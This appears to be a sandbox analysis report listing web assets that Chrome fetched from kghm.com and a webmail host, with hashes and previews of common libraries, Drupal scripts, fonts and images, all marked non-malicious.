                                          SHA-512:E497FBF68286997C1D201267E34E1A0B357DBA08FA3B8981C445516DC88EDCD0FB73A5E7DEE572BCEB71782DFFDC132B2AC51BE6EAFCEF4FF8B06C7F5D7D561D
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/sites/default/files/styles/modular_page_featured_tile/public/2024-02/kghm_ekozdrowie_basen_0_0.jpg.webp?itok=J9jozmLc
                                          Preview:RIFF@R..WEBPVP8 4R..0*...*|...>m,.E."..k6.@.....Y.$FT.......|...;......c.../......?._....{.....?........y.s...W................7._..._x/...?....\.3.....?.c..;......./i..........|!.M.........~1..?75..'.d]{:V...je....z...@../.K..b.k{....#W.5....,+...R.:....`.'U..l....A...:...x.......l.>i.O.z.\?jZ.J.|&..O...J..2.....e.iv.s.x^.s.....%..I;.).~5T...XS3..d'....%..V.Z....3...h.."..3h|..p.8..7..;wE.X]...Z.B.$.+..iM.i..7&\PO.Y.V.\7mc.4..J.&..FB...u.*....l2.Xp.#2.........p..a..0...}..n.....Q.=.i.....;.I1[.+V..s.....B...Q..aS..0Ns.....|...^=...T..1(.f..!_..We............./'t.X.^._kv.:.8..._.D1U.V.VEU....+DJ..b........Ag.v*:.....j..uq%.+..~.V'..x.).LDdieg...vK79.FR.#...N...8.$.^..*..h.]Z..'..k...\u...}.FLEG;.....~Y.......Wi...{..vY'.....$N.....-..~.....8.=..%C...g..@....f..*@U.].`..{.h...f$V...@.]. .....V..z"..3.W..}...Ms..q.4..b+.;...)f..P......w..d#...._.4=..!...9...:...hy..a/.!.'_..M.......GDIUp.Ze.$]..e.1~g.?...r.5'.l...._....X......".K..Un.W.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 20 x 15, 8-bit colormap, non-interlaced
                                          Category:dropped
                                          Size (bytes):356
                                          Entropy (8bit):6.381564038143346
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E6E1D1F45D8E81A76951665992B0CEAC
                                          SHA1:2BB5C976D1005513DE9DC71D47DB2404198C7765
                                          SHA-256:385794A596A828EDD7F1BF5C694050E645BA665FAA3D770BC9DB22D3C2C6C9E1
                                          SHA-512:506884290B5B472471566EC8F1E95D8532A27FB941DC07CD3928D657B17E46D432602FF128D8F5B9F6A1E2C7826E5CC667B51C40E0E7A05E132E20FDE471C6C3
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR..............F.g....sRGB...,....xPLTE...........................................................................................................................)...(tRNS.......a`2E...?...Z..h..4..f=...J.......w1...fIDATx.m.E..0.D......7$..$...I..J,M....z.9..s..Y.|.A.....)..T."V.Zz.A.I.....0N....z.Yc.qc?...'p.G.._...,....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32065)
                                          Category:downloaded
                                          Size (bytes):85578
                                          Entropy (8bit):5.366055229017455
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:2F6B11A7E914718E0290410E85366FE9
                                          SHA1:69BB69E25CA7D5EF0935317584E6153F3FD9A88C
                                          SHA-256:05B85D96F41FFF14D8F608DAD03AB71E2C1017C2DA0914D7C59291BAD7A54F8E
                                          SHA-512:0D40BCCAA59FEDECF7243D63B33C42592541D0330FEFC78EC81A4C6B9689922D5B211011CA4BE23AE22621CCE4C658F52A1552C92D7AC3615241EB640F8514DB
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://ajax.googleapis.com/ajax/libs/jquery/2.2.4/jquery.min.js
                                          Preview:/*! jQuery v2.2.4 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){var c=[],d=a.document,e=c.slice,f=c.concat,g=c.push,h=c.indexOf,i={},j=i.toString,k=i.hasOwnProperty,l={},m="2.2.4",n=function(a,b){return new n.fn.init(a,b)},o=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,p=/^-ms-/,q=/-([\da-z])/gi,r=function(a,b){return b.toUpperCase()};n.fn=n.prototype={jquery:m,constructor:n,selector:"",length:0,toArray:function(){return e.call(this)},get:function(a){return null!=a?0>a?this[a+this.length]:this[a]:e.call(this)},pushStack:function(a){var b=n.merge(this.constructor(),a);return b.prevObject=this,b.context=this.context,b},each:function(a){return n.each(this,a)},map:function(a){return this.pushStack(n.map(this,function(b,c){return a.call
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (23577)
                                          Category:downloaded
                                          Size (bytes):23739
                                          Entropy (8bit):4.757288600127199
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:04425BBDC6243FC6E54BF8984FE50330
                                          SHA1:8C15C6BD82C71E9EF1BB11CF24E502FE07518AC5
                                          SHA-256:541AC58217A8ADE1A5E292A65A0661DC9DB7A49AE13654943817A4FBC6761AFD
                                          SHA-512:8BCF90CAD84E6324247BA5DB4AD8EDF53E3240786133EF58F724D8D5F3B1A03430B10A4A304A48A12419F265689AD9D509FF4F06FA100E72A5D3A80638E0F5F5
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://cdnjs.cloudflare.com/ajax/libs/font-awesome/4.3.0/css/font-awesome.min.css
                                          Preview:/*!. * Font Awesome 4.3.0 by @davegandy - http://fontawesome.io - @fontawesome. * License - http://fontawesome.io/license (Font: SIL OFL 1.1, CSS: MIT License). */@font-face{font-family:'FontAwesome';src:url('../fonts/fontawesome-webfont.eot?v=4.3.0');src:url('../fonts/fontawesome-webfont.eot?#iefix&v=4.3.0') format('embedded-opentype'),url('../fonts/fontawesome-webfont.woff2?v=4.3.0') format('woff2'),url('../fonts/fontawesome-webfont.woff?v=4.3.0') format('woff'),url('../fonts/fontawesome-webfont.ttf?v=4.3.0') format('truetype'),url('../fonts/fontawesome-webfont.svg?v=4.3.0#fontawesomeregular') format('svg');font-weight:normal;font-style:normal}.fa{display:inline-block;font:normal normal normal 14px/1 FontAwesome;font-size:inherit;text-rendering:auto;-webkit-font-smoothing:antialiased;-moz-osx-font-smoothing:grayscale;transform:translate(0, 0)}.fa-lg{font-size:1.33333333em;line-height:.75em;vertical-align:-15%}.fa-2x{font-size:2em}.fa-3x{font-size:3em}.fa-4x{font-size:4em}.fa-5x{fon
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (530)
                                          Category:dropped
                                          Size (bytes):531
                                          Entropy (8bit):5.026091894993598
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:81044B7B8667AEC5BF91EB2DFEDA1783
                                          SHA1:B65C3EF80E4E66D0181371C5F9A701CBA23E8C56
                                          SHA-256:1B597F1CB806A52371B3F2A1FD33159D088BB02FDEF604A491D90497747EB837
                                          SHA-512:4EC8B3E63DA16E3992FED723C17F4AC016803598223BEA222A1E832F556DE38495245AB15C207DD8844919C8A846A6A77C23D2ACFEBFA49812D692CB1D44B295
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:((e,a)=>{a.behaviors.initMainSlider={attach(){e(".field--name-field-slides").not(".slick-initialized").slick({infinite:!0,slidesToShow:1,slidesToScroll:1,dots:!1,arrows:!1,autoplay:!0,autoplaySpeed:5e3,fade:!0}),e(".field--name-field-slides").on("beforeChange",(i,s,l,d)=>{e(`[data-index=${l}]`).removeClass("active"),e(`[data-index=${d}]`).addClass("active")}),e(".nav-item").on("click",i=>{e(".field--name-field-slides").slick("slickGoTo",e(i.target).data("index"))}),e('[data-index="0"]').addClass("active")}}})(jQuery,Drupal);.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 24 x 12, 4-bit colormap, non-interlaced
                                          Category:downloaded
                                          Size (bytes):210
                                          Entropy (8bit):6.305873369443647
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:CDF92E329CC12FA614A9B706250D8498
                                          SHA1:D19753E0424B36D45A23360921C615F54FE59375
                                          SHA-256:57EA54A19A47DC49BF624211F8827A5686BAB98DC994FE9762CFAD1ED332FFEA
                                          SHA-512:DD4F74B340F5B14DE1FF570B87C44EAB811FAA90311F01FD3CC4BDD722FD30DDDADCA4BD55482031AF6512493C07A17409D7474C7B2D08B2D422162756298A4F
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/images/languageicons/en.png
                                          Preview:.PNG........IHDR...............`F...'PLTE.$}.=.&E...+.Pb.fv.....................v&....gIFg....|Y.S...VIDAT..c.<.......1.!...r...`Ba.5..K..l.a...bs0.`..P9(...z..m.......fk0..&...x.`i.s.<...1%.*.s....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:TrueType Font data, digitally signed, 18 tables, 1st "DSIG", 26 names, Macintosh, Copyright 2011 The Montserrat Project Authors (https://github.com/JulietaUla/Montserrat)Montserr
                                          Category:downloaded
                                          Size (bytes):263192
                                          Entropy (8bit):6.14696135609082
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:9C46095118380D38F12E67C916B427F9
                                          SHA1:FF1EB5D360A42C0C675D8ECFCA9A3E5B709D302A
                                          SHA-256:81EBC3916B524007B756D91D9DF13C7673EC401161F2CAD161662D08DCF1CC72
                                          SHA-512:66C32CE2E7A2006CA731CCBD7C116BCE255E664F5AE5E259C7204C2154F9A6A76ACA2A73583403033910CCB6ABA454D1A1D12050E2F5880EF4B54F7AD2BE798B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/dist/assets/Montserrat-Regular-so4Npfx_.ttf
                                          Preview:........... DSIG............GDEF.6.b...,....GPOS..........4.GSUBx0m...8`..=<OS/2U..B..u....`cmap......u....(cvt /R.H........fpgmM$.|.......mgasp............glyfw*.y...$....head.F.n..i(...6hhea...7..i`...$hmtx......i....\loca..~........0maxp...Y....... name..9....0...]post.B.......WJprep.K.....8...............V...a...H...J.....................................................0.:...<.U...W.Y...[...............................B...D.K...N.s...u...................-.../.@...B.g...i.................................................7...9.;...=.p...s.s...u.w...z............................................................................................................................................................./...1.2...4.5...7.7...9.:...<.B...H.H...J.J...L.N...P.T...W.[...]._...a.d...f.f...h.h...j.r...t........................................................................._...{...........................!.$...&.'...,.F...J.K...M.]...{.|...............&....DFLT..cyrl.$latn.j..............
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:Unicode text, UTF-8 text, with very long lines (38578)
                                          Category:dropped
                                          Size (bytes):94103
                                          Entropy (8bit):5.256401638390884
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:30D88E147AFAA18359FB155BA0CDAD0B
                                          SHA1:0B8757A54BAE20AD421BF35F71B8EE27E8E25395
                                          SHA-256:02C833FFE036968E050EE454931D95E42244917789B149F397DEC518E34AA259
                                          SHA-512:2303948E7855482B1C16F015DDB94FA0C2BC8ABAB421C20FB136DBFF2C2BEDB7DF0D45642F1F8755DE1BED9D41383DBCA2F616DDB69F685E054DDF3659904180
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/* @license GNU-GPL-2.0-or-later https://www.drupal.org/licensing/faq */.(function($,Drupal,drupalSettings,once){"use strict";Drupal.TBMegaMenu=Drupal.TBMegaMenu||{};Drupal.TBMegaMenu.oldWindowWidth=0;Drupal.TBMegaMenu.displayedMenuMobile=false;Drupal.TBMegaMenu.supportedScreens=[980];Drupal.TBMegaMenu.focusableElements='a:not([disabled]), button:not([disabled]), input:not([disabled]), select:not([disabled]), textarea:not([disabled]), details:not([disabled]), [tabindex]:not([disabled]):not([tabindex="-1"])';Drupal.TBMegaMenu.menuResponsive=function(){var windowWidth=window.innerWidth?window.innerWidth:$(window).width();var navCollapse=$('.tb-megamenu').children('.nav-collapse');if(windowWidth<Drupal.TBMegaMenu.supportedScreens[0]){navCollapse.addClass('collapse');if(Drupal.TBMegaMenu.displayedMenuMobile)navCollapse.css({height:'auto',overflow:'visible'});else navCollapse.css({height:0,overflow:'hidden'});}else{navCollapse.removeClass('collapse');if(navCollapse.height()<=0)navCollapse.c
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (65362)
                                          Category:dropped
                                          Size (bytes):173816
                                          Entropy (8bit):5.302085688436518
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:AADC0BD1AD74063A442F7DBEB9D1D860
                                          SHA1:BC615F20A40A424634765ACE2F71E2E0026C772B
                                          SHA-256:6BA796D13617C8B10330E88DB7583499BC28FCF0806AEABD0F83BBE748A3BBB2
                                          SHA-512:BCCA568E6A8F8B6D414D8F63667D74C538DEECC9DB84FA12DE1A95488E57A742550FAB893232AEDD53B88260394C0B118C723535EFD756472BEA7312D5892079
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/* @license MIT https://raw.githubusercontent.com/jquery/jquery/3.7.1/LICENSE.txt */./*! jQuery v3.7.1 | (c) OpenJS Foundation and other contributors | jquery.org/license */.!function(e,t){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=e.document?t(e,!0):function(e){if(!e.document)throw new Error("jQuery requires a window with a document");return t(e)}:t(e)}("undefined"!=typeof window?window:this,function(ie,e){"use strict";var oe=[],r=Object.getPrototypeOf,ae=oe.slice,g=oe.flat?function(e){return oe.flat.call(e)}:function(e){return oe.concat.apply([],e)},s=oe.push,se=oe.indexOf,n={},i=n.toString,ue=n.hasOwnProperty,o=ue.toString,a=o.call(Object),le={},v=function(e){return"function"==typeof e&&"number"!=typeof e.nodeType&&"function"!=typeof e.item},y=function(e){return null!=e&&e===e.window},C=ie.document,u={type:!0,src:!0,nonce:!0,noModule:!0};function m(e,t,n){var r,i,o=(n=n||C).createElement("script");if(o.text=e,t)for(r in u)(i=t[r]||t.getAttri
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 1 icon, 48x48, 32 bits/pixel
                                          Category:downloaded
                                          Size (bytes):9662
                                          Entropy (8bit):2.9719961549463036
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:8B05AD095647928513B20D17337E5C79
                                          SHA1:58425EAFE1D0A4A56725C320B8C9F8724E9EF898
                                          SHA-256:DBC348E86BD3AD01472FA8B4428F7518DE8A6225D4AFB91FD2E5CD3B2010F1C5
                                          SHA-512:04C612F1FEDCDFFB90E88C77EEC8C4EA89B2A530AB904DC424205DD65210D142D67027D1E26D23AA08CBED285BA642E4D2A89A82E78A474DCF8B526BABF5706E
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/themes/custom/kghm/favicon.ico
                                          Preview:......00.... ..%......(...0...`..... ......%......................................................................................Wu.HWu..Wu.j............................................................................................................................................................................Wu..Vt..Vu..Wu..Wu..Wu..Vt.0............................................................................................................................................................Vu..Wu..Vu..Vu..Wu..Wu..Wu..Wu..Vu..Wu..Vt..................................................................................................................................................Wu.XVu..Vu..Vt..Wu..Wu..Vt..Vt..Wu..Vt..Vu..Vu..Wu.yWu..................................................................................................................................Wu.0Vt..Wu..Wu..Wu..Wu..Vu..Wu..Vt..Vu..Wu..Wu..Vt..Wu..Wu..Vu..Vt.K..............................................................
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:MS Windows icon resource - 1 icon, 64x64, 32 bits/pixel
                                          Category:downloaded
                                          Size (bytes):16958
                                          Entropy (8bit):3.247942103829815
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:924A68D347C80D0E502157E83812BB23
                                          SHA1:1622A7CAA5A0CFA28A96CF10043D6E7B63B491E3
                                          SHA-256:7B30E499996EC4631848D3509D803D9311F5D71999212F2F4C1CA7AF8F24EB69
                                          SHA-512:F366AC7F1B54471F7222D5425BBB08DA8EA971F175FE96D1B551020CF85184F2E76BB49D270C711CF6F7937D809D6446CF5E2C0E4F4C2BAADB5925EB97EF146B
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://webmail.supremecluster.com/skins/elastic/images/favicon.ico?s=1593860317
                                          Preview:......@@.... .(B......(...@......... .................................................................................................................................................UNA'UO?...7...4'........................................................................................................................................................................................................................................UU@.TP@.TO@.TO@...7...7...7...0.............................................................................................................................................................................................................................TOA^TO@.TO@.TO@.TO@...7...7...7...7...7o..U.............................................................................................................................................................................................................SOA7TO@.TO@.TO@.TO@.TO@.TO@...7...7...7...7...7...7...9?..............
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (32030)
                                          Category:downloaded
                                          Size (bytes):86709
                                          Entropy (8bit):5.367391365596119
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:E071ABDA8FE61194711CFC2AB99FE104
                                          SHA1:F647A6D37DC4CA055CED3CF64BBC1F490070ACBA
                                          SHA-256:85556761A8800D14CED8FCD41A6B8B26BF012D44A318866C0D81A62092EFD9BF
                                          SHA-512:53A2B560B20551672FBB0E6E72632D4FD1C7E2DD2ECF7337EBAAAB179CB8BE7C87E9D803CE7765706BC7FCBCF993C34587CD1237DE5A279AEA19911D69067B65
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://code.jquery.com/jquery-3.1.1.min.js
                                          Preview:/*! jQuery v3.1.1 | (c) jQuery Foundation | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.1.1",r=function(a,b){return new r.fn.init(a,b)},s=/^[\s\uFEFF\xA0]+|[\s\uFEFF\xA0]+$/g,t=/^-ms-/,u=/-([a-z])/g,v=function(a,b){return b.toUpperCase()};r.fn=r.prototype={jquery:q,constructor:r,length:0,toArray:function(){return f.call(this)},get:function(a){return null==a?f.call(this):a<0?this[a+this.length]:this[a]},pushStack:function(a){var b=r.merge(this.con
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (48664)
                                          Category:dropped
                                          Size (bytes):48944
                                          Entropy (8bit):5.272507874206726
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:14D449EB8876FA55E1EF3C2CC52B0C17
                                          SHA1:A9545831803B1359CFEED47E3B4D6BAE68E40E99
                                          SHA-256:E7ED36CEEE5450B4243BBC35188AFABDFB4280C7C57597001DE0ED167299B01B
                                          SHA-512:00D9069B9BD29AD0DAA0503F341D67549CCE28E888E1AFFD1A2A45B64A4C1BC460D81CFC4751857F991F2F4FB3D2572FD97FCA651BA0C2B0255530209B182F22
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:PNG image data, 18 x 12, 8-bit/color RGB, non-interlaced
                                          Category:dropped
                                          Size (bytes):219
                                          Entropy (8bit):6.096827380525983
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:4CCCF36A8D662D9C2D58C81B3E0D050D
                                          SHA1:875067B36F822BA62BE9A722E3C6AE45D59C7610
                                          SHA-256:7FE9F0DCD21B82F8C42C72E16BBC86BA38BACA9646D046EA1AFAB18F227C1DF3
                                          SHA-512:5693F16E291F7B025A47AB47A0D2C67607B73C8BDA8DB32D720E993C59DBE5CFC15D3B93E7CD2ECEC0B938EA933E2C75C1E79C268BA1D0519E2A38332FAB16E4
                                          Malicious:false
                                          Reputation:unknown
                                          Preview:.PNG........IHDR..............pz.....sRGB.........gAMA......a.....pHYs..........o.d....tEXtSoftware.paint.net 4.0.5e.2e...LIDAT(Sc`.\...-..'.@.q9.."...............:..f....."....H.....Um92.64.-...;t.6..;....IEND.B`.
                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                          File Type:ASCII text, with very long lines (33268), with no line terminators
                                          Category:downloaded
                                          Size (bytes):33268
                                          Entropy (8bit):4.940418841877366
                                          Encrypted:false
                                          SSDEEP:
                                          MD5:0273D41F87F4744573B74613DC459DB2
                                          SHA1:EE67DD42DA1334CF96B08EDFCC20E2530BD34923
                                          SHA-256:FC7BB70734FC84937D79FD60DF6382002554CCA4E3A945E186FA0B1EE42289B9
                                          SHA-512:2C443DCCC8F79A817FDEA8485096E88EECC769F4335279908EF5677AEEE204403D113D0D09A913BE16983CA88187E0AA71B422D214F58A8B6177BF8955191CBA
                                          Malicious:false
                                          Reputation:unknown
                                          URL:https://kghm.com/modules/contrib/eu_cookie_compliance/js/eu_cookie_compliance.min.js?v=10.2.3
                                          Preview:!function(_,u,l,p){"use strict";var t,r=void 0===l.eu_cookie_compliance.cookie_value_disagreed||""===l.eu_cookie_compliance.cookie_value_disagreed?"0":l.eu_cookie_compliance.cookie_value_disagreed,s=void 0===l.eu_cookie_compliance.cookie_value_agreed_show_thank_you||""===l.eu_cookie_compliance.cookie_value_agreed_show_thank_you?"1":l.eu_cookie_compliance.cookie_value_agreed_show_thank_you,m=void 0===l.eu_cookie_compliance.cookie_value_agreed||""===l.eu_cookie_compliance.cookie_value_agreed?"2":l.eu_cookie_compliance.cookie_value_agreed,k=(u.behaviors.euCookieCompliancePopup={attach:function(e){if(void 0!==l.eu_cookie_compliance){const i=document.querySelector(l.eu_cookie_compliance.containing_element);var o;i.getAttribute("data-eu-cookie-compliance-once")||(i.setAttribute("data-eu-cookie-compliance-once","true"),h=k.getCurrentStatus(),d=k.getAcceptedCategories(),l.eu_cookie_compliance.popup_eu_only_js?u.eu_cookie_compliance.showBanner()&&(o=l.path.baseUrl+l.path.pathPrefix+"eu-cookie-c
                                          No static file info